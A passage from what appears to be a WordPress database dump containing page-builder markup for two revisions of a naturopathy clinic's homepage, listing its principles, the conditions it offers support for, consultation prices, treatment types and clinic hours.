global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>We can support health in many conditions, including:</span></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\"><span>digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>nervous system imbalance (anxiety, low mood, stress, poor sleep)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>metabolic dysfunction (insulin resistance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>immune dysfunction (autoimmunity, recurrent infections)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>thyroid conditions (hyper/hypothyroidism)</span></span><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>cardiovascular health (chronic inflammation, high cholesterol)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>men\'s health (prostate issues, sexual health)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>children\'s health (poor immunity, digestive issues, behavioural issues)</span></span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></span><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span>We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (75 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up consult (45 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><br /><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & Mundaring</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\"></span></strong></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-6pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-08-22 16:45:45','2021-08-22 08:45:45','',28,'https://verdenaturopathy.com.au/?p=353',0,'revision','',0),(351,1,'2021-08-22 16:34:28','2021-08-22 08:34:28','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" hover_enabled=\"0\" custom_padding=\"||27px|||\" sticky_enabled=\"0\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>We can support health in many conditions, including:</span></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\"><span>gastrointestinal issues (IBS, IBD, GORD, bloating, poor digestion)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>nervous system imbalance (anxiety, low mood, stress, poor sleep)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>metabolic dysfunction (insulin resistance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>immune dysfunction (autoimmunity, recurrent infections)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>thyroid conditions (hyper/hypothyroidism)</span></span><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>hormonal imbalance (PCOS, endometriosis, PMS, menopause, period abnormalities)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>cardiovascular health (chronic inflammation, high cholesterol)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>men\'s health (prostate issues, sexual health)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>children\'s health (poor immunity, digestive issues, behavioural issues)</span></span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></span><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span>We offer free 15-min chats to help you decide if naturopathy is right for you; please contact us to schedule a call. </span></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" hover_enabled=\"0\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\" sticky_enabled=\"0\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" 